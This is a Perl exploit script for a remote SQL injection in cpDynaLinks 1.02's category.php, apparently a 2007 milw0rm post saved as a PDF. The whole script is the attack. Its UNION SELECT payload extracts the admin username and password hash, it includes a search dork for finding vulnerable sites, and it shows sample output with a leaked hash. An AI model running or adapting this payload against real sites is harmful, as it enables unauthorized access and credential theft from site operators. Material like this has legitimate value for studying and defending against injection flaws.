cpDynaLinks 1.02 category.php Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 3 # cpDynaLinks 1.02 Remote Sql Inyection exploit 4 # download: 5 # http://www.cplinks.com/download/cpdynalinks/cpdynalinks_version_1_02_full.zip 6 # bug found by s0cratex 7 # exploit written by ka0x 8 # D.O.M TEAM 2007 9 # d0rk: Powered by cpDynaLinks 10 # need magic_quotes_gpc off 11 12 # contact: <ka0x01[at]gmail.com> <s0cratex[at]nasa.gov> 13 14 # ka0x@domlabs:~# perl cpdynalinks.pl http://127.0.0.1/ 15 # 16 # [+] connecting in http://127.0.0.1/... 17 # [!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039 18 19 use strict; 20 use LWP::UserAgent; 21 22 my $host = $ARGV[0]; 23 24 if(!$ARGV[0]) { 25 print "\n[x] cpDynaLinks 1.02 Remote Sql Inyection exploit\n"; 26 print "[x] written by ka0x − ka0x01[at]gmail.com\n"; 27 print "[x] usage: perl $0 [host]\n"; 28 print "[x] example: http://host.com/cpDynaLinks\n"; 29 exit(1); 30 } 31 32 print "\n[+] connecting in $host...\n"; 33 my $cnx = LWP::UserAgent−>new() or die; 34 my $go=$cnx−>get($host."/category.php?category=−1’/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,admin_username,0x20205b2 15d20706173733a20,admin_password,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*"); 35 if ($go−>content =~ m/____(.*?)____/ms) { 36 print "$1\n"; 37 } else { 38 print "\n[−] exploit failed\n"; 39 } 40 41 # milw0rm.com [2007−10−10] Page 1/1 cpDynaLinks 1.02 category.php Remote SQL Injection Exploit ka0x 10/10/2007